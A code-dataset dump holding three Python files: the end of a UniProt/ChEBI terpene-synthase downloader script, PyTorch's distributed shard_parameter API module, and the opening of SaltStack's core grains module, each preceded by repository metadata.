                if _id:
                    if _id not in _ids:
                        _ids.append(_id)
                    else:
                        sys.stderr.write("Warning: Duplicated Uniprot ID %s requested in %s file, ignoring it.\n" % (_id, infile))
    return _ids
def write_fasta_file(sequence2_uniprot_pri_accs, datetime, accessions=None):
    """Write deduplicated protein sequences into a timestamped FASTA file.

    sequence2_uniprot_pri_accs maps a sequence -> set of primary accessions;
    each record's header lists all accessions sharing that sequence. When
    *accessions* is given, only clusters whose accessions all belong to it
    are written (file name gets the 'to_be_added_new_proteins' prefix).

    NOTE: the 'datetime' parameter shadows the datetime module inside this
    function; callers pass it by keyword so it cannot be renamed safely.
    """
    # BUGFIX: default used to be a shared mutable list ('accessions=[]')
    accessions = accessions or []
    if not accessions:
        _filename = 'TPSdownloader_' + datetime + '.fasta'
    else:
        _filename = 'TPSdownloader_to_be_added_new_proteins__' + datetime + '.fasta'
    _i = 0
    with open(_filename, 'w') as _outfile:
        for _myseq, _accession_ids in sequence2_uniprot_pri_accs.items():
            # write when no filter was given, or when every accession of this
            # sequence cluster is contained in the requested subset
            if not accessions or not [x for x in _accession_ids if x not in accessions]:
                _outfile.write(">%s%s%s%s" % (' '.join(_accession_ids), os.linesep, _myseq, os.linesep))
                _i += 1
    print("Info: Wrote %s file with %d protein sequences" % (_filename, _i))
def main():
    """Top-level driver: collect requested Uniprot IDs, parse cached or freshly
    downloaded Uniprot/ChEBI XML data, split reaction ChEBI IDs into substrates
    and products, and write the merged tables as XLSX/CSV plus FASTA files.

    Raises ValueError when no Uniprot IDs were provided or table lengths
    become inconsistent.
    """
    create_cache()
    # unused code
    # _known_terpenes = parse_known_terpenes()
    _uniprot_pri_acc2aliases = {}
    _uniprot_aliases2pri_acc = {}
    _all_uniprot_ids = set()
    _all_chebi_ids = set()
    _all_product_chebi_ids = set()
    _all_ec_numbers = set()
    _all_rhea_ids = set()
    _sequence2_uniprot_pri_accs = {}
    if myoptions.uniprot_ids_from_file and not os.path.exists(myoptions.uniprot_ids_from_file):
        raise ValueError("File %s does not exist." % str(myoptions.uniprot_ids_from_file))
    _already_parsed = []
    if myoptions.xls_storage and os.path.exists(myoptions.xls_storage) and myoptions.xls_storage != 'None':
        _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = parse_storage(myoptions.xls_storage)
    else:
        # one can disable the default value with passing None on the commandline
        _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = initialize_data_structures()
    _output_dict_of_lists = copy.deepcopy(_empty_template_dict_of_lists)
    # BUGFIX: the dict used to be passed as a second argument to print(),
    # leaving the %s placeholder unexpanded
    if myoptions.debug: print("Debug: Initialized data structures and parsed XLS storage into _uniprot_dict_of_lists=%s" % str(_uniprot_dict_of_lists))
    #_myindex = _uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_myindex])))
    _already_parsed = list(_uniprot_dict_of_lists['Uniprot ID'])
    _ids_parsed_from_xls_storage = list(_already_parsed)
    _primaries = []
    # when working with same substance ID, issue eventual warning just once per ChEBI ID
    _warn_once_per_chebi_entry = []
    # parse previously obtained multi-entry XML data, if any
    for _filename in os.listdir('.TPSdownloader_cache/uniprot/multientry/'):
        print("Info: Found multi-entry XML file %s" % '.TPSdownloader_cache/uniprot/multientry/' + _filename)
        if os.path.getsize('.TPSdownloader_cache/uniprot/multientry/' + _filename):
            print("Info: Parsing %s" % '.TPSdownloader_cache/uniprot/multientry/' + _filename)
            for _primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence in parse_uniprot_xml('.TPSdownloader_cache/uniprot/multientry/' + _filename, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _already_parsed):
                process_parsed_uniprot_values(_all_uniprot_ids, _all_chebi_ids, _uniprot_dict_of_lists, _chebi_dict_of_lists, _already_parsed, _primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _primaries, _warn_once_per_chebi_entry)
    if myoptions.debug:
        print("Debug: After parsing multi-entry XML files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
        print("Debug: After parsing multi-entry XML files _all_chebi_ids=%s" % str(_all_chebi_ids))
    # get list of Uniprot IDs to obtain
    if myoptions.uniprot_id:
        download_uniprot(myoptions.uniprot_id)
        # BUGFIX: '(myoptions.uniprot_id)' was a plain string which later
        # code would iterate per character; a single-item list is intended
        _ids = [myoptions.uniprot_id]
    elif myoptions.uniprot_ids_from_file and os.path.exists(myoptions.uniprot_ids_from_file):
        # get list of accessions, fetch their single-entry XML files unless already in local cache and parse them
        _ids = fetch_ids_from_xlsx(myoptions.uniprot_ids_from_file, _primaries, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _uniprot_dict_of_lists, _already_parsed, _all_uniprot_ids, _all_chebi_ids)
    elif myoptions.uniprot_idfile:
        _ids = parse_idfile(myoptions.uniprot_idfile)
    else:
        # BUGFIX: _ids used to stay undefined here, so the check below raised
        # NameError instead of the intended ValueError
        _ids = []
    if not _ids:
        raise ValueError("No Uniprot IDs provided to act upon, nothing to do. Either specify input ids via --uniprot-id-file or provide an input XLSX file via --uniprot-ids-from-file with a column 'Uniprot ID' in 'Sheet1'")
    if myoptions.debug:
        print("Debug: After parsing UniProt IDs from files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
        print("Debug: After parsing UniProt IDs from files _all_chebi_ids=%s" % str(_all_chebi_ids))
    #_myindex = _uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_myindex])))
    _aliases = _uniprot_aliases2pri_acc.keys()
    _ids = convert_to_primary_ids(_ids, _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
    # parsing the already curated list of entries is suboptimal via parse_storage() so provide another hook just to input the protein IDs
    # keep this in a distinct list
    if myoptions.already_curated_idfile:
        _ids_manually_collected2 = parse_idfile(myoptions.already_curated_idfile)
        _ids_manually_collected2 = convert_to_primary_ids(_ids_manually_collected2, _primaries, _aliases, [], _uniprot_aliases2pri_acc)
    else:
        _ids_manually_collected2 = []
    _obsolete_entries = []
    for _id in _ids: # it is probably better to keep original ordering and just omitting duplicated Uniprot IDs
        if _id not in _already_parsed: # we have to be certain it is a current listing
            _filename = '.TPSdownloader_cache/uniprot/' + _id + '.xml'
            if os.path.exists(_filename) and os.path.getsize(_filename):
                for _primary_accession, _secondary_accessions, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence in parse_uniprot_xml(_filename, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _already_parsed):
                    process_parsed_uniprot_values(_all_uniprot_ids, _all_chebi_ids, _uniprot_dict_of_lists, _chebi_dict_of_lists, _already_parsed, _primary_accession, _secondary_accessions, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _primaries, _warn_once_per_chebi_entry)
            elif _id not in _primaries and _id not in _uniprot_aliases2pri_acc:
                # This entry is obsolete
                # A0A1C4NU45, A0A1C4QLD8, A0A6H2TAF2, A0A6M0EDU3, A0A6M0EJ23, A0A6M0E6U2, A0A6N9WZ95, A0A6N9XB68, A0A6N9XHS1, A0A7H5IRS5, A0A7H5ITL2, A0A7H5JDR3, A0A7H5JHP0
                # https://www.uniprot.org/help/proteome_redundancy
                sys.stderr.write("Warning: No single-entry XML file %s exists and the %s was not parsed in multi-entry XML files yet. This could be a protein deleted from Uniprot/TrEMBL but kept in UniParc.\n" % (str(_filename), _id))
                _obsolete_entries.append(_id)
            else:
                print("Info: XML file with %s does not exist, cannot parse it." % _id)
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
    _aliases = _uniprot_pri_acc2aliases.values()
    # make sure the Uniprot IDs in the manually curated table are indeed primary IDs, likewise check the list of requested IDs
    _ids_parsed_from_xls_storage = convert_to_primary_ids(_ids_parsed_from_xls_storage, _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
    _ids_manually_collected2 = convert_to_primary_ids(_ids_manually_collected2, _primaries, _aliases, [], _uniprot_aliases2pri_acc)
    _requested_primary_ids = convert_to_primary_ids(set(_ids) - set(_obsolete_entries), _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
    if myoptions.debug:
        print("Debug: after parsing single-entry XML files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
        print("Debug: after parsing single-entry XML files _obsolete_entries=%s" % str(_obsolete_entries))
        print("Debug: after parsing single-entry XML files _all_chebi_ids=%s" % str(_all_chebi_ids))
    print("Info: len(_already_parsed)=%s" % len(_already_parsed))
    #print("AAAAA: len(_uniprot_dict_of_lists)=%d, len(_uniprot_dict_of_lists['Uniprot ID'])=%s, _uniprot_dict_of_lists: %s" % (len(_uniprot_dict_of_lists), len(_uniprot_dict_of_lists['Uniprot ID']), str(_uniprot_dict_of_lists)))
    if myoptions.debug > 1: print("Debug: After parsing ChEBI files _uniprot_dict_of_lists=", str(_uniprot_dict_of_lists))
    print("Info: There are %s 'ChEBI ID' entries in _chebi_dict_of_lists: %s" % (len(_chebi_dict_of_lists['ChEBI ID']), str(_chebi_dict_of_lists)))
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
    # re-copy the parsed data into rows if there are multiple _chebi_ids annotated (pointing to multiple cyclic terpenes), other ChEBI IDs were discarded
    _unique_uniprot_ids = _uniprot_dict_of_lists['Uniprot ID']
    _merged_ids_manually_collected = set(_ids_parsed_from_xls_storage).union(set(_ids_manually_collected2))
    for _uniprot_row_pos, _uniprot_id in enumerate(_unique_uniprot_ids):
        if _uniprot_id in _requested_primary_ids or _uniprot_id in _merged_ids_manually_collected: # transfer for output only those Uniprot IDs which we were asked for plus those in the xls_storage
            if myoptions.debug:
                print("Debug: Will output Uniprot ID %s" % _uniprot_id)
            _chebi_id_lists = _uniprot_dict_of_lists['ChEBI ID'][_uniprot_row_pos]
            _reactions = _uniprot_dict_of_lists['Reactions'][_uniprot_row_pos]
            _product_ids = _uniprot_dict_of_lists['Product ChEBI IDs'][_uniprot_row_pos]
            _rhea_ids = _uniprot_dict_of_lists['Rhea IDs'][_uniprot_row_pos]
            # BUGFIX: _ec_numbers was mistakenly read from the 'Rhea IDs' column
            _ec_numbers = _uniprot_dict_of_lists['EC numbers'][_uniprot_row_pos]
            for _myval in _uniprot_dict_of_lists['Rhea IDs'][_uniprot_row_pos]:
                _all_rhea_ids.update(_myval)
            for _myval in _uniprot_dict_of_lists['EC numbers'][_uniprot_row_pos]:
                _all_ec_numbers.update(_myval)
            for _myval in _uniprot_dict_of_lists['Product ChEBI IDs'][_uniprot_row_pos]:
                _all_product_chebi_ids.update(_myval)
            # for each CHEBI item in _nested_chebi_ids, output a dedicated line in the output
            if len(_output_dict_of_lists['ChEBI ID']) != len(_output_dict_of_lists['Uniprot ID']):
                print_dict_lengths(_uniprot_dict_of_lists, '_uniprot_dict_of_lists')
                print_dict_lengths(_chebi_dict_of_lists, '_chebi_dict_of_lists')
                print_dict_lengths(_output_dict_of_lists, '_output_dict_of_lists')
                raise ValueError("Error: %s: Sizes do not match,\n_output_dict_of_lists: %s\n" % (_uniprot_id, str(_output_dict_of_lists)))
            if (_reactions and _reactions[0]) or (_product_ids and _product_ids[0]) or (_rhea_ids and _rhea_ids[0]) or (_ec_numbers and _ec_numbers[0]):
                if myoptions.debug:
                    print("Debug: %s: _reactions=%s" % (_uniprot_id, str(_reactions)))
                    print("Debug: %s: _product_ids=%s" % (_uniprot_id, str(_product_ids)))
                    print("Debug: %s: _rhea_ids=%s" % (_uniprot_id, str(_rhea_ids)))
                    print("Debug: %s: _ec_numbers=%s" % (_uniprot_id, str(_ec_numbers)))
                if len(_reactions) != len(_product_ids):
                    raise ValueError("Error: %s: Sizes do not match: len(_reactions)=%s, len(_product_ids)=%s, _reactions=%s, _product_ids=%s" % (_uniprot_id, len(_reactions), len(_product_ids), str(_reactions), str(_product_ids)))
                for _i, _reaction in enumerate(_reactions):
                    # re-copy the Uniprot-originating data
                    if _product_ids[_i]:
                        _product_chebi_id = _product_ids[_i][0] # there is only a single item
                    else:
                        # https://www.uniprot.org/uniprot/A2PZA5.xml
                        # <reaction evidence="4 8">
                        # <text>
                        # (2E,6E)-farnesyl diphosphate + isopentenyl diphosphate = (2E,6E,10E)-geranylgeranyl diphosphate + diphosphate
                        # </text>
                        # <dbReference type="Rhea" id="RHEA:17653"/>
                        # <dbReference type="ChEBI" id="CHEBI:33019"/>
                        # <dbReference type="ChEBI" id="CHEBI:58756"/>
                        # <dbReference type="ChEBI" id="CHEBI:128769"/>
                        # <dbReference type="ChEBI" id="CHEBI:175763"/>
                        # <dbReference type="EC" id="2.5.1.29"/>
                        # </reaction>
                        if myoptions.run_mode == 'terpene_synthases':
                            print("Info: %s: No cyclic terpene ChEBI ID found for a product of reaction=%s" % (_uniprot_id, str(_reaction)))
                        _product_chebi_id = None
                    for _column in _uniprot_dict_of_lists.keys():
                        _val = _uniprot_dict_of_lists[_column][_uniprot_row_pos]
                        if _val:
                            _output_dict_of_lists[_column].append(_val)
                        else:
                            _output_dict_of_lists[_column].append('')
                    if _product_chebi_id:
                        _chebi_row_pos = _chebi_dict_of_lists['ChEBI ID'].index(_product_chebi_id)
                        for _column in ['Type (mono, sesq, di, …)', 'cyclic/acyclic']:
                            _val = _chebi_dict_of_lists[_column][_chebi_row_pos]
                            if _val:
                                _output_dict_of_lists[_column].append(_val)
                            else:
                                _output_dict_of_lists[_column].append('')
                    else:
                        for _column in ['Type (mono, sesq, di, …)', 'cyclic/acyclic']:
                            _output_dict_of_lists[_column].append('')
            else:
                # re-copy just the Uniprot-originating data
                for _column in _uniprot_dict_of_lists.keys():
                    try:
                        _val = _uniprot_dict_of_lists[_column][_uniprot_row_pos]
                    except IndexError:
                        sys.stderr.write("Error: There are the following columns defined in _uniprot_dict_of_lists: %s\n" % str(_uniprot_dict_of_lists.keys()))
                        raise IndexError("Row %s in '%s' column is missing, cannot copy its values from _uniprot_dict_of_lists which has length %s" % (str(_uniprot_row_pos), str(_column), len(_uniprot_dict_of_lists[_column])))
                    if _val:
                        _output_dict_of_lists[_column].append(_val)
                    else:
                        _output_dict_of_lists[_column].append('')
                # fill-in the missing ChEBI data placeholders
                # for _column in _chebi_dict_of_lists.keys():
                #     _output_dict_of_lists[_column].append('')
                for _column in ['Type (mono, sesq, di, …)', 'cyclic/acyclic']:
                    _output_dict_of_lists[_column].append('')
            _myseq = _uniprot_dict_of_lists['Amino acid sequence'][_uniprot_row_pos]
            # print("Debug: %s: _myseq=%s, _sequence2_uniprot_pri_accs.keys()=%s" % (_uniprot_id, str(_myseq), str(_sequence2_uniprot_pri_accs.keys())))
            if _myseq in _sequence2_uniprot_pri_accs.keys():
                # BUGFIX: membership used to be tested against the
                # sequence-keyed dict itself instead of the accession set
                if _uniprot_id not in _sequence2_uniprot_pri_accs[_myseq]:
                    _sequence2_uniprot_pri_accs[_myseq].update([_uniprot_id])
            else:
                _sequence2_uniprot_pri_accs[_myseq] = set([_uniprot_id])
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
    print_dict_lengths(_uniprot_dict_of_lists, '_uniprot_dict_of_lists')
    print_dict_lengths(_chebi_dict_of_lists, '_chebi_dict_of_lists')
    print_dict_lengths(_output_dict_of_lists, '_output_dict_of_lists')
    _all_chebi_ids = natsorted(list(_all_chebi_ids))
    _all_product_chebi_ids = natsorted(list(_all_product_chebi_ids))
    _all_ec_numbers = natsorted(list(_all_ec_numbers))
    _all_rhea_ids = natsorted(list(_all_rhea_ids))
    #print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
    # NOTE(review): the branch logic below looks inverted — sequences whose
    # accessions do NOT match the curated IDs are appended to
    # _already_curated_sequences; confirm the intent before changing it
    _already_curated_sequences = []
    for _myseq, _accessions in _sequence2_uniprot_pri_accs.items():
        if [x for x in _merged_ids_manually_collected if x in _accessions]:
            print("Info: %s: protein sequence already annotated" % _myseq)
        else:
            _already_curated_sequences.append(_myseq)
    _newly_annotated_dict_of_lists = copy.deepcopy(_empty_template_dict_of_lists)
    for _id in _requested_primary_ids:
        if _id not in _merged_ids_manually_collected:
            try:
                _uniprot_row_pos = _output_dict_of_lists['Uniprot ID'].index(_id)
            except ValueError:
                if _id in _obsolete_entries:
                    # BUGFIX: was 'pass', which fell through and reused a
                    # stale _uniprot_row_pos from the previous iteration
                    continue
                else:
                    raise ValueError("Cannot find Uniprot ID %s in _requested_primary_ids" % _id)
            _myseq = _uniprot_dict_of_lists['Amino acid sequence'][_uniprot_row_pos]
            if _myseq not in _already_curated_sequences:
                # the first entry with a unique sequence for a cluster of entries will win, no matter if is annotated or not
                for _column in _output_dict_of_lists.keys():
                    _val = _output_dict_of_lists[_column][_uniprot_row_pos]
                    if _val:
                        _newly_annotated_dict_of_lists[_column].append(_val)
                    else:
                        _newly_annotated_dict_of_lists[_column].append('')
            else:
                # TODO: maybe check if the current entry is annotated in more detail?
                pass
    # or maybe better do it in Pandas?
    # https://stackoverflow.com/questions/42483959/copy-some-rows-from-existing-pandas-dataframe-to-a-new-one
    _df_newly_annotated = pd.DataFrame(_newly_annotated_dict_of_lists)
    print("Info: %d entries in _all_chebi_ids=%s" % (len(_all_chebi_ids), str(_all_chebi_ids)))
    print("Info: %d entries in _all_product_chebi_ids=%s" % (len(_all_product_chebi_ids), str(_all_product_chebi_ids)))
    print("Info: %d entries in _all_ec_numbers=%s" % (len(_all_ec_numbers), str(natsorted(_all_ec_numbers))))
    print("Info: %d entries in _all_rhea_ids=%s" % (len(_all_rhea_ids), str(natsorted(_all_rhea_ids))))
    print("Info: %d entries in _obsolete_entries=%s" % (len(_obsolete_entries), str(_obsolete_entries)))
    # move dictionary of lists into Pandas dataframe at once
    _df = pd.DataFrame(_output_dict_of_lists)
    _df_all_product_chebi_ids = pd.DataFrame(_all_product_chebi_ids)
    _df_all_ec_numbers = pd.DataFrame(_all_ec_numbers)
    _df_all_rhea_ids = pd.DataFrame(_all_rhea_ids)
    if myoptions.debug:
        print_df(_df)
        print_df(_df_all_product_chebi_ids)
        print_df(_df_all_ec_numbers)
        print_df(_df_all_rhea_ids)
        print_df(_df_newly_annotated)
    _datetime = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
    writer = pd.ExcelWriter("TPSdownloader_" + _datetime + ".xlsx", engine='xlsxwriter')
    # NOTE(review): sheet name 'All Rhead IDs' is a typo for 'Rhea' — kept
    # as-is because downstream consumers may already reference it
    frames = {'Sheet1': _df, 'All Product ChEBI IDs': _df_all_product_chebi_ids, 'All EC numbers': _df_all_ec_numbers, 'All Rhead IDs': _df_all_rhea_ids, 'New proteins to be curated': _df_newly_annotated}
    #now loop through and put each on a specific sheet
    for sheet, frame in frames.items(): # .use .items for python 3.X
        frame.to_excel(writer, sheet_name = sheet, index = False)
    #critical last step
    writer.save()
    print("Info: Wrote TPSdownloader_" + _datetime + ".xlsx file.")
    write_csv_and_xls(_df, datetime=_datetime)
    write_csv_and_xls(_df_all_product_chebi_ids, suffix="product_ChEBI_IDs_", datetime=_datetime)
    write_csv_and_xls(_df_all_ec_numbers, suffix="EC_numbers_", datetime=_datetime)
    write_csv_and_xls(_df_all_rhea_ids, suffix="Rhea_IDs_", datetime=_datetime)
    write_fasta_file(_sequence2_uniprot_pri_accs, datetime=_datetime, accessions=[])
    write_fasta_file(_sequence2_uniprot_pri_accs, datetime=_datetime, accessions=_newly_annotated_dict_of_lists['Uniprot ID'])
    #if myoptions.outfmt == "csv":
    #    df.to_csv("TPSdownloader.csv", index=False, sep='\t')
    #elif myoptions.outfmt == "xls":
    #    df.to_excel("TPSdownloader.xls", index=False)
    #else:
    #    # maybe more formats would be helpful?
    #    df.to_excel("TPSdownloader.xls", index=False)
# Script entry point: run the downloader only when executed directly,
# not when imported as a module.
if __name__ == "__main__":
    main()
# vim:ts=4:sw=4:expandtab:smartindent
| 60.026475 | 1,044 | 0.654381 |
8543a1c1569809cead52e5a861f1e32f17b9bff8 | 5,885 | py | Python | torch/distributed/shard/api.py | jiajianglong/pytorch | 815532d40c25e81d8c09b3c36403016bea394aee | [
"Intel"
] | 1 | 2022-01-31T14:15:35.000Z | 2022-01-31T14:15:35.000Z | torch/distributed/shard/api.py | SurajPratap10/pytorch | 63bc76798477f2e3af7d5f92abf1d78eb7bd2a54 | [
"Intel"
] | null | null | null | torch/distributed/shard/api.py | SurajPratap10/pytorch | 63bc76798477f2e3af7d5f92abf1d78eb7bd2a54 | [
"Intel"
] | null | null | null | import copy
import torch
import torch.distributed as dist
from torch.distributed import distributed_c10d
from .sharding_spec import (
ChunkShardingSpec,
ShardingSpec,
)
from torch.distributed.shard.sharding_spec._internals import (
get_chunked_dim_size,
get_split_size,
)
from torch.distributed.shard.sharded_tensor import (
Shard,
ShardMetadata,
ShardedTensor,
)
def shard_parameter(
        module: torch.nn.Module,
        param_name: str,
        sharding_spec: ShardingSpec,
        src_rank=0,
        process_group=None):
    """
    Given a :class:`torch.nn.Module`, a ``param_name`` for a parameter in that
    module, it shards that parameter according to the provided
    ``sharding_spec``. ``src_rank`` denotes the source rank which would be
    used as the ground truth of the data which would be scattered as shards
    across the rest of the ranks.

    This method replaces ``module.param_name`` with a
    :class:`torch.distributed.shard.sharded_tensor.ShardedTensor`

    Args:
        module (:class:`torch.nn.Module`): Module whose parameter needs to be sharded.
        param_name (str): Name of the parameter of ``module`` that needs to be sharded.
        sharding_spec (:class:`torch.distributed.shard.sharding_spec.ShardingSpec`): The specification
            describing how to shard the Tensor.

    Keyword args:
        src_rank (int, optional): The source rank which is used as the ground truth of
            the data for the parameter that would be sharded and scattered
            across the rest of the ranks.
            Default: 0.
        process_group (ProcessGroup, optional): The process group to work on. If None,
            the default process group will be used.

    .. warning::
        Only :class:`torch.distributed.shard.sharding_spec.ChunkShardingSpec` is
        currently supported as the ``sharding_spec`` (enforced by the
        ``isinstance`` check below).
    """
    # Perform some validation first.
    if not isinstance(sharding_spec, ChunkShardingSpec):
        raise ValueError('Only ChunkShardingspec is supported.')

    if not hasattr(module, param_name):
        raise ValueError(f'module: {module} does not have parameter with name: {param_name}')

    tensor = getattr(module, param_name)
    if not isinstance(tensor, torch.Tensor):
        raise ValueError(f'Expected {type(module).__name__}.{param_name} to be a Tensor, but found {type(tensor).__name__}')

    # narrow() below assumes a contiguous source tensor.
    if not tensor.is_contiguous():
        raise ValueError(f'param: {param_name} is not a contiguous Tensor')

    pg = process_group if process_group is not None else distributed_c10d._get_default_group()
    world_size = dist.get_world_size(pg)
    rank = dist.get_rank(pg)

    # Validate src_rank and sharding_spec are same across all ranks.
    # Every rank contributes its (src_rank, sharding_spec) pair; any mismatch
    # means the collective calls below would diverge, so fail loudly instead.
    gathered_list = [None] * world_size
    dist.all_gather_object(gathered_list, (src_rank, sharding_spec), group=pg)

    for idx, entry in enumerate(gathered_list):
        if src_rank != entry[0]:  # type: ignore[index]
            raise ValueError(
                f'src_rank={src_rank} on rank: {rank} does not '  # type: ignore[index]
                f'match with src_rank={entry[0]} on rank: {idx}')
        if sharding_spec != entry[1]:  # type: ignore[index]
            raise ValueError(
                f'sharding_spec={sharding_spec} on rank: {rank} does not '  # type: ignore[index]
                f'match with sharding_spec={entry[1]} on rank: {idx}')

    # Rearrange chunks according to placement.
    # Build one ShardMetadata per placement, walking offsets along the
    # sharding dimension; remember the metadata for this rank's own shard.
    local_metadata = None
    current_offsets = [0] * len(tensor.size())
    shards_metadata = []
    sharding_dim_size = tensor.size(sharding_spec.dim)  # type: ignore[arg-type]
    split_size = get_split_size(sharding_dim_size, world_size)
    tensor_sizes = list(tensor.size())
    for idx, placement in enumerate(sharding_spec.placements):
        chunked_dim_size = get_chunked_dim_size(sharding_dim_size, split_size, idx)
        shard_size = copy.deepcopy(tensor_sizes)
        shard_size[sharding_spec.dim] = chunked_dim_size  # type: ignore[index]

        shard_metadata = ShardMetadata(
            shard_offsets=copy.deepcopy(current_offsets),
            shard_sizes=shard_size,
            placement=placement,
        )
        shards_metadata.append(shard_metadata)

        if rank == placement.rank():  # type: ignore[union-attr]
            local_metadata = shard_metadata

        current_offsets[sharding_spec.dim] += chunked_dim_size  # type: ignore[index]

    # Scatter the shards (use broadcast since NCCL doesn't support scatter, this is very inefficient).
    dist.broadcast(tensor, src=src_rank, group=pg)

    # NOTE(review): local_metadata stays None if this rank appears in no
    # placement, making the narrow() below fail with AttributeError — confirm
    # callers guarantee exactly one shard per rank.

    # Reshape to get shard for this rank and we don't want autograd
    # recording here for the narrow op and 'local_shard' should be a
    # leaf variable in the autograd graph.
    local_shard = tensor.narrow(
        sharding_spec.dim,  # type: ignore[arg-type]
        local_metadata.shard_offsets[sharding_spec.dim],  # type: ignore[union-attr, arg-type, index]
        local_metadata.shard_sizes[sharding_spec.dim],  # type: ignore[union-attr, index]
    ).clone().detach().contiguous()

    # Sync requires_grad to local_shard.
    local_shard.requires_grad = tensor.requires_grad

    # Create ShardedTensor based on local shards.
    local_shards = [
        Shard(
            tensor=local_shard,
            metadata=local_metadata,  # type: ignore[arg-type]
        )
    ]
    st = ShardedTensor._init_from_local_shards(local_shards, tensor.size(), process_group=pg)

    # Manually set sharding_spec
    st._sharding_spec = sharding_spec

    # Replace param with ShardedTensor.

    # Need to delete the attribute first since param_name might be
    # torch.nn.Parameter and can't be replaced with ShardedTensor which is
    # not torch.nn.Parameter.
    delattr(module, param_name)

    # Now we can set the attribute appropriately.
    setattr(module, param_name, st)
93571401e2e7a9f8a753f6613b3c591fd880759f | 89,127 | py | Python | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | null | null | null | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | 1 | 2019-09-06T13:57:28.000Z | 2019-09-06T13:57:28.000Z | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | 1 | 2020-09-30T16:09:48.000Z | 2020-09-30T16:09:48.000Z | # -*- coding: utf-8 -*-
'''
The static grains, these are the core, or built in grains.
When grains are loaded they are not loaded in the same way that modules are
loaded, grain functions are detected and executed, the functions MUST
return a dict which will be applied to the main grains dict. This module
will always be executed first, so that any grains loaded here in the core
module can be overwritten just by returning dict keys with the same value
as those returned here
'''
# Import python libs
from __future__ import absolute_import
import os
import json
import socket
import sys
import re
import platform
import logging
import locale
import uuid
import salt.exceptions
from salt.ext.six.moves import range
__proxyenabled__ = ['*']
__FQDN__ = None
# Extend the default list of supported distros. This will be used for the
# /etc/DISTRO-release checking that is part of platform.linux_distribution()
from platform import _supported_dists
_supported_dists += ('arch', 'mageia', 'meego', 'vmware', 'bluewhite64',
'slamd64', 'ovs', 'system', 'mint', 'oracle', 'void')
# Import salt libs
import salt.log
import salt.utils
import salt.utils.network
import salt.utils.dns
if salt.utils.is_windows():
import salt.utils.win_osinfo
# Solve the Chicken and egg problem where grains need to run before any
# of the modules are loaded and are generally available for any usage.
import salt.modules.cmdmod
import salt.modules.smbios
# Import 3rd-party libs
import salt.ext.six as six
__salt__ = {
'cmd.run': salt.modules.cmdmod._run_quiet,
'cmd.retcode': salt.modules.cmdmod._retcode_quiet,
'cmd.run_all': salt.modules.cmdmod._run_all_quiet,
'smbios.records': salt.modules.smbios.records,
'smbios.get': salt.modules.smbios.get,
}
log = logging.getLogger(__name__)
HAS_WMI = False
if salt.utils.is_windows():
# attempt to import the python wmi module
# the Windows minion uses WMI for some of its grains
try:
import wmi # pylint: disable=import-error
import salt.utils.winapi
import win32api
import salt.modules.reg
HAS_WMI = True
__salt__['reg.read_value'] = salt.modules.reg.read_value
except ImportError:
log.exception(
'Unable to import Python wmi module, some core grains '
'will be missing'
)
_INTERFACES = {}
def _windows_cpudata():
    '''
    Return some CPU information on Windows minions
